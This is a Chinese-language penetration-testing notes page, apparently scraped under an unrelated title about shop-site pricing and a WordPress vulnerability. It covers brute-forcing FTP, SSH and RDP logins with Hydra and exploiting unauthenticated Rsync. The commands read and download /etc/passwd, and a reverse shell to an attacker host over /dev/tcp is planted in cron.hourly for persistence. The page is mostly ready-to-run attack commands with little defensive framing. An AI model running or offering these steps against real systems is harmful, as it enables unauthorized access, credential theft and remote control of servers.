商城网站制作需要多少费用wordpress 4.9.4 漏洞
文章目录
- 口令猜解——Hydra-FTP&RDP&SSH
 - 配置不当——未授权访问—Rsync文件备份
 - 协议漏洞——应用软件-FTP&Proftpd搭建
 
 
 
 
口令猜解——Hydra-FTP&RDP&SSH
- FTP:文本传输协议,端口21;
 - RDP:windows上远程终端协议,端口3389;
 - SSH:linux远程终端协议,端口22。
 
hydra -L test -P 10top1K.txt <ip地址> ftp -V
hydra -l root -P 10top1K.txt <ip地址> ssh -V
hydra -l administrator -P 10top1K.txt <ip地址> rdp -V
 
密码项目:fuzzDicts
配置不当——未授权访问—Rsync文件备份
Rsync:linux文件同步的应用程序,常用于本地计算机和远程计算机之间文件同步,端口873。
- 判断是否存在Rsync未授权访问:
rsync rsync://<ip:port>/
 出现上述信息,说明存在rsync未授权访问。
 - 利用: 
- 读取文件:
rsync rsync://<ip:port>/src/ - 下载文件:
rsync rsync://<ip:port>/src/passwd ./ - 上传文件:
rsync -av passwd rsync://<ip:port>/src/tmp/passwd 
 - 读取文件:
 - 反弹shell(借助系统计划任务) 
- 获取信息:
rsync rsync://<ip:port>/src/etc/crontab /root/cron.txt(下载到本地查看) - 本地创建后门文件
 
touch shell //创建文件//文件内容 /bin/bash -i >& /dev/tcp/<攻击机ip:port> 0>&1chmod +x shell //修改文件权限- 上传文件:
rsync -av shell rsync://<ip:port>/src/etc/cron.hourly(上传到可利用的计划任务中) 
 - 获取信息:
 
fofa爬虫:fofa_viewer
 
协议漏洞——应用软件-FTP&Proftpd搭建
Proftpd:用于架设ftp服务。
